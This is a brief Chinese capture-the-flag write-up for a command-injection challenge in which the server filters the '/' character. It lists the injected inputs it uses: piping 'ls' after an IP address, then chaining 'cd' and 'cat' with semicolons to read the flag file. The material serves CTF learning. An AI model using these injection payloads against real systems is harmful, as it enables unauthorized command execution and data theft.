题目描述Solution 题目描述这次过滤了目录分割符 / ,你能读到 flag 目录下的 flag 文件吗。 Solution打开网页,可以看到网页源代码: 先看看当前目录有什么文件: 0.0.0.0 | ls -l 我们看看flag_is_here目录下有什么东西: 0.0.0.0 | ls flag_is_here 从源代码可知,后端用正则匹配过滤了/符号。我们可以用分号多命令执行的方式绕过: 0.0.0.0; cd flag_is_here; cat flag_16225566211066.php